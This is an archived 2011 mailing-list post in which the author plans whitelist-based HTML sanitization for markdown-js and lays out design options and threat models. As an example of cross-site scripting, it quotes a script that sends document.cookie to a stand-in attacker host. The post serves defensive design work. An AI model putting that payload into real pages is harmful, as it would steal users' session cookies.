thr3ads.net - Markdown Discuss - HTML sanitization [Jul 2011]

If this information is useful, please help other people find it:
Share via:
Kragen Javier Sitaker
2011-Jul-29 15:59 UTC
HTML sanitization

Hi.

I'm going to add HTML sanitization to markdown-js, and I wanted to hear
about
other people's experience with this.  This mail is long, should take about
five
minutes to read, but I'll be wasting a lot more time than five minutes if I
go
down a dead-end rabbit hole on this.  From my comments on [the issue on
GitHub][]:

[the issue on GitHub]:
https://github.com/evilstreak/markdown-js/issues/16#issuecomment-1681056
   (issue 16 on markdown-js: "HTML support")

(I've bolded some phrases below to facilitate skimming; hope it's not
too
annoying when you're reading straight through.)

Okay, well, I guess I'm committed to implementing this, then. Here's
what I'm
thinking about how to do it. Is this a good way to do it? **I'd really
appreciate comments** before I go haring off without the benefit of other
people's advice and experience.

*   JsonML doesn't have a spec written in English, as far as I can tell,
just a
    [BNF grammar][] and some example implementations in [XSLT][] and [JS with
    the DOM][DOM]. As far as I can tell, both of the example implementations
    unescape entity references on input and re-escape them on output, although
    there's no English text to explain whether this is intentional or a bug.

    I assert that **this is a bug**, because it robs JsonML of any way to
    represent SGML entity references. I propose that JsonML strings should be
    treated as PCDATA ? allowed to contain entities but not tags ? rather than
    CDATA (plain text) or HTML (text with entities and tags).

[BNF grammar]: http://jsonml.org/ (The JSONML spec)
[XSLT]: http://jsonml.org/JsonML.xslt
[DOM]: http://jsonml.org/JsonML_DOM.js

*   Accordingly, when we *parse* a code block or inline code chunk, we should
    escape `&` and `<` in it, and when we parse any other node, we should
run
    it through an HTML parser to break it down into subnodes, ensuring that
    it's well-formed, modulo possible references to entities that we
don't know
    about.  (I don't propose to include a list of all defined HTML entities
    into markdown-js.) This means that in general we will **not escape HTML on
    output**.  It also means that the effect of poorly-nested input tags will
    be limited to at most one parse-tree node.

*   The HTML parser used as an input filter should be **configurable with
    whitelists** of tags, attributes per tag, and URL schemes per attribute. By
    default it should be configured with a fairly strict filter, blocking even
    inline images and iframes with off-host URIs, and of course any possible
    vector for JS. This will annoy people like cadorn, for whom such filtering
    is unnecessary, and they need to have an easy way to turn off the
    whitelists (if not the HTML parsing entirely). But I think that is better
    than someone doing a `git pull` on markdown-js and getting privacy and XSS
    problems added to their application. That is, **the default should be
    safe**.

I'm **hoping I can use an existing pure-JS HTML parser** ? say,
[jsdom][]'s, or
[kn_htmlsafe_htmlSanitize][], or [NodeHtmlParser][] ? rather than hacking one
together from scratch. (As a fallback, I could write a very simple parser for
the tags-and-attributes subset of XHTML.) I'm a little worried about the
performance implications of this; markdown-js is already a little slower than
Showdown, and this could make the matter worse. Does **anybody have
recommendations here?**

(In the case where it's running in a modern browser, we could use
`DOMParser`
as an optimization, but enough people are using markdown-js in Node that I
think it doesn't make sense to depend on that.)

[jsdom]: https://github.com/tmpvar/jsdom
    (Elijah Insua's MIT-licensed pure-JS implementation of the W3C DOM)
[kn_htmlsafe_htmlSanitize]:
http://mod-pubsub.cvs.sourceforge.net/viewvc/mod-pubsub/mod_pubsub/js_pubsub/js/kn_htmlsafe.js?revision=1.2&view=markup
    (Ben Sittler's 3-clause BSD-licensed whitelisting, but not particularly
configurable, pure-JS HTML sanitizer)
[NodeHtmlParser]: https://github.com/kirbysayshi/node-htmlparser
    (A forgiving HTML/XML/RSS parser written in JS for both the browser and
NodeJS)

Other variations:

1.  **Parse HTML on output**, not input, instead of building JsonML nodes in
    the intermediate representation. 

    This has the disadvantage that it would make some kinds of processing on
    the intermediate representation harder ? for example, in [yamemex][], I
    want to support Twitter-style #hashtags, and that will be easier to do if I
    can tell which hash marks are in the text of the document and which are in
    some URL somewhere. Also, any markup added by intermediate-representation
    processing would be prone to being stripped by the output filter.

    The advantage is that it would probably make the intermediate processing
    run faster and take less memory, and it expands the HTML parsers that can
    be used beyond just those that build a parse tree, which is slow; HTML
    parsers that simply produce sanitized HTML could be used.  Also, the
    intermediate representation would be simpler, since it wouldn't have
HTML
    tag names in it. This would involve changing the intermediate
"JsonML"
    representation to have HTML rather than  CDATA or PCDATA contents ? so
`&`
    would be represented as `&amp;` in the intermediate representation, not
as
    `&`, and `<b>` would mean `<b>`.

2.  Leave the semantics of the intermediate representation unchanged aside from
    adding more tag names, parsing HTML on input and  **using an exhaustive
    list of HTML entities** to convert things like `&copy;` &copy; and
    `&ddagger;` &ddagger; to Unicode characters. I think this would be a
hassle
    to maintain. (Note that &ddagger; doesn't show up correctly here
    [clarification: on GitHub] because GitHub has undertaken to maintain such a
    list for their Markdown implementation ? and failed. Visit the URL
    `data:text/html,&ddagger;` to see that your browser supports it.)

3.  Rather than parsing HTML on input or when rendering each node for output,
    pass through HTML tags from input to output (except inside code blocks, of
    course) and then run a final HTML-sanitizing pass on the output string to
    ensure that it's well-formed and safe.  This has the advantage of very
    minimal coupling, and it would handle e.g. `<img
    src="http://webbugs.example.com/">` the same way regardless of
whether it
    was generated from `![ ](http://webbugs.example.com/)` or just included
    literally in the source; the disadvantages are that it may be even slower
    than the other alternatives (making  an additional pass over markup whose
    well-formedness and safety is guaranteed by construction), it could be a
    little more bug-prone ("Where did all of my `<ol>`s go? Oh, I
left `ol` out
    of the whitelist."), and it doesn't facilitate intermediate
processing in
    any way.

[yamemex]: https://github.com/kragen/yamemex/tree/markdown-js
    (My project using markdown-js for, ultimately, social bookmarking.)

So, **what do other people think?** The above represents a few hours of me
thinking about the problem, but I anticipate that implementing it will take at
least a few days of work, so I'd really appreciate help in thinking this
through before I jump in.

Kragen

P.S.  I guess I should elaborate a little bit on the kinds of use cases/threat
models I'm thinking of here:

1.  Using Markdown to write your own blog on your own domain, which is
cadorn's
    use case. There's little benefit to filtering your markup in this case;
the
    worst case is that your blog is formatted funny because you forgot to close
    a `<blockquote>` or something. Unless you copy and paste a chunk of
HTML
    from somewhere else, which brings us to:

2.  Using Markdown to render stuff pulled (manually or automatically) from
    another [origin][]. The risk here is that the author of the stuff may have
    included some code to take actions on your behalf and exfiltrate your
    private information (known as "cross-site scripting"), either in a
    straightforward way such as `<script>im=new Image();
   
im.src="http://malicious.example.com/?"+document.cookie</script>`
or some
    more subtle way designed to evade na?ve filters. Doing this reliably
    requires that you use a whitelist rather than a blacklist so you don't
end
    up like the [stupid losers who built MySpace][Samy].

[origin]: http://www.w3.org/Security/wiki/Same_Origin_Policy
    (As defined in the same-origin policy.)
[Samy]: http://namb.la/popular/tech.html
    (Samy Kamkar explains the unbelievably incompetent security measures he
hacked around to crash MySpace.)

    Note that this category includes things like blogging software where
    someone might plausibly copy and paste a piece of someone else's web
page
    in order to quote it.

3.  Using Markdown to render stuff sent by a possible spammer or by someone else
    who has an illegitimate interest in knowing whether you have read it ? such
    as email ? in which case you do *not* want to confirm to the spammer that
    you have read it. In this case want to filter out anything whose rendering
    will generate network traffic (to anywhere other than the source of the
    rendered document, that is), such as `<img src>` and `<iframe>`,
as well as
    all the items covered in #2 above.

I believe yamemex is in category 2, because I excerpt the pages I bookmark with
it all the time. markdown-js is currently safe for this case because it escapes
all HTML, but I want it to let through safe HTML. I think that almost any
server-based web application that renders Markdown taken from client requests
is in category 2, if not category 3, and I think (though I don't know) that
many markdown-js applications do that.
Seemingly Similar Threads

Search for more seemingly similar threads
Markdown Discuss - Jul 2011 - HTML sanitization

HTML sanitization

Seemingly Similar Threads

Wisdom of the Ancients